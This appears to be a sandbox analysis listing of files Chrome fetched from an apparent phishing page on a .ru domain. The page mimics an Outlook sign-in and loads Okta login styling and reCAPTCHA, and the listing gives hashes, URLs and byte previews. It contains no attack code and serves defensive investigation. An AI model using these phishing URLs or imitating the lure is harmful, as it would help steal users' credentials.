                                                                  SHA-512:F494B9B4490CEC1E630A194E55C7713576B55CEABDDADD2786231976670390811F33B22A477EF0CB3457FF2D502C7F6CF77F2DCA8846A504BA4765FE2A223320
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Y"..qsj..7#...K.[.4..........4E....z..y.o...6V._...d.........u..)..\.]....}j... ....Ge..^Wl.$W.B..lRv9.A:H%.eR;b.muWc.\.g..t....e..Fe..&.W........qC....p...........$....a5.[IH.s./J.w.........Q....I\.V...E..).k..&7V...`.9..........R..'j.E.\g..W-.. ..{..EY...1......y.....SEk4.d..dc.+>k...WR.MV7...._.*O....ZE..]..VM.....!,....U...do..h4..`.sE...'9..b.....1
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (52013), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):153084
                                                                  Entropy (8bit):6.000331978016997
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:DFAE0B43FB2506781DF0BFFF2941B13F
                                                                  SHA1:5427831EA4A897ED6683C58C0ED20CE6447CFA1E
                                                                  SHA-256:DD723BF464C2C2FDC9B3B4F5B8828C986C7A354FB125B764E6657104D7E08EBC
                                                                  SHA-512:A87D7DC895A0F511518FD4D0BD7E9A90D6C28A3FFD4F125441A1BD9346A4B5213E9A9DFC4697549E41F7BCCA9A8D5438963B9BFC533447519F1935B3CDCD080D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHU
                                                                  Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (10450)
                                                                  Category:downloaded
                                                                  Size (bytes):10498
                                                                  Entropy (8bit):5.327380141461276
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:E0D37A504604EF874BAD26435D62011F
                                                                  SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                  SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                  SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                  Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):530
                                                                  Entropy (8bit):7.2576396280117494
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                                                  SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                                                  SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                                                  SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                  Category:downloaded
                                                                  Size (bytes):28000
                                                                  Entropy (8bit):7.99335735457429
                                                                  Encrypted:true
                                                                  SSDEEP:
                                                                  MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                  SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                  SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                  SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/GDSherpa-bold.woff2
                                                                  Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):9648
                                                                  Entropy (8bit):7.9099172475143416
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:4946EB373B18D178C93D473489673BB6
                                                                  SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                  SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                  SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/ophWiuhE9GhMo1Iuc1EtOZmJk6WgA6klGn5stqM5NxIPbKQjpaJ8Kuvc7difuAmcd233
                                                                  Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):78627
                                                                  Entropy (8bit):6.021138721379474
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:018091787DDDEE5A6875F94365CF788F
                                                                  SHA1:6067D5B8AB62B31FCAF4889DE51C1D66E84C4AE7
                                                                  SHA-256:AD13459D8BC3401CEB6E2AC3062FC1C48EA7ED6058E63F4E643F1A83B9D4C3CB
                                                                  SHA-512:DEB681A52DC116A8EECAB28204D50E1B5F9B4BBD93AA723C81F11D9D6F3361B0CBE255959D574E8FFAD4EBEC33DC5CFE07776EBFC807E6DE44B4B18915E79BCB
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://www.gstatic.com/recaptcha/releases/bUO1BXI8H9PgjAPSW9hwuSeI/styles__ltr.css
                                                                  Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #444746;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):93276
                                                                  Entropy (8bit):7.997636438159837
                                                                  Encrypted:true
                                                                  SSDEEP:
                                                                  MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                  SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                  SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                  SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/GDSherpa-vf2.woff2
                                                                  Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:dropped
                                                                  Size (bytes):268
                                                                  Entropy (8bit):5.111190711619041
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:59759B80E24A89C8CD029B14700E646D
                                                                  SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                  SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                  SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:dropped
                                                                  Size (bytes):17842
                                                                  Entropy (8bit):7.821645806304586
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:4B52ECDC33382C9DCA874F551990E704
                                                                  SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                  SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                  SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):600
                                                                  Entropy (8bit):7.391634169810707
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                                                  SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                                                  SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                                                  SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://www.gstatic.com/recaptcha/api2/refresh_2x.png
                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:downloaded
                                                                  Size (bytes):2905
                                                                  Entropy (8bit):3.962263100945339
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:FE87496CC7A44412F7893A72099C120A
                                                                  SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                  SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                  SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/yzdQtVS4GZ6E51fEe1WiaTcO2T94coK4b5rsvJmFyXkpoAHmVSFi3h9nbLL1XtW90179
                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:downloaded
                                                                  Size (bytes):7390
                                                                  Entropy (8bit):4.02755241095864
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                  SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                  SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                  SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/kl3OQPVclSq17SCChDj1jr79iwxalfvR1OKgPc5D4jl1dD56167
                                                                  Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:dropped
                                                                  Size (bytes):25216
                                                                  Entropy (8bit):7.947339442168474
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:F9A795E2270664A7A169C73B6D84A575
                                                                  SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                  SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                  SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:data
                                                                  Category:downloaded
                                                                  Size (bytes):560963
                                                                  Entropy (8bit):5.66523764950852
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:9C6C8C06F33F695B719B0E47A8DD51BB
                                                                  SHA1:7FC1FEFA8F38192B257E903331B731E5D931A579
                                                                  SHA-256:E7FC4A5F9F016995A6440B6CEA0BF78AD727EB72ED69C98787979275C1D676A1
                                                                  SHA-512:47DE75E17EF70B7DA53CA4F9445BD66F6999D7F84CD0019190988C1C554681F48730D4A63D3D285F9D798C20E6D3F92E57998E5E8D7DC23037E8811682B59F06
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://www.gstatic.com/recaptcha/releases/bUO1BXI8H9PgjAPSW9hwuSeI/recaptcha__en.js
                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var X=function(){return[function(y,d,E,c,t,z,F,V,T,w,a,h,r,Z,q){return y+1>>(((y^57)&7)==((y+((y|72)==(Z=[9,"W",28],y)&&(q=ED()),Z)[0]^8)>=y&&y-4<<2<y&&(q=Promise.resolve(X[37](7,240,"B",0,E,d))),1)&&(w=r0()-z.Y,V=new ZF,T=p[39](37,c,E,w,z.u),a=p[21](71,V,Wy,E,T),h=p[39](38,c,E,w,z[Z[1]]),F=p[21](43,a,Wy,t,h),r=p[Z[2]](11,z.gP,F,d),q=p[Z[2]](14,z.PR,r,7)),3)==2&&(q=L[42](67,E,Y[49](19,d,t),c)),q},function(y,d,E,c,t,z,F,V,T,w){return((y^13)&((y|48)==((y&(T=[2,"N",3],92))==y&&(this.zs=d,this.eH=E,t=.Y[7](19,S9),this[T[1]]=!!t&&c===t||!1),y)&&(this.l=d,this[T[1]]=E),T)[2])==T[0]&&c!=d&&(t==d?V=(F=I6)!=d?F:I6={}:V=t.c
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):102
                                                                  Entropy (8bit):4.894815171607268
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:338D2B4B23BC8440059813E17EDB4708
                                                                  SHA1:30EDF24DFE0A845A566E1221D6770C6F8E4E04BE
                                                                  SHA-256:9BE5FCDAABC32295ABAA67C5565B9CAB7BD8DCCE77E59D84BDF8818683BA998E
                                                                  SHA-512:F4BC4FE10E72DCED443A1F13BA066441B1FC87906B9B3CABCC531CB62E21F8FB4A345EDD5C4E1A88A272C3E5D3CAF39147C531BBFA5E6AECD4F6E0311EA77C1A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI
                                                                  Preview:importScripts('https://www.gstatic.com/recaptcha/releases/bUO1BXI8H9PgjAPSW9hwuSeI/recaptcha__en.js');
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):16
                                                                  Entropy (8bit):3.75
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:AFB69DF47958EB78B4E941270772BD6A
                                                                  SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                                  SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                                  SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCfK5KtINJUeoEgUNU1pHxSF38uZgcs6pMQ==?alt=proto
                                                                  Preview:CgkKBw1TWkfFGgA=
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:downloaded
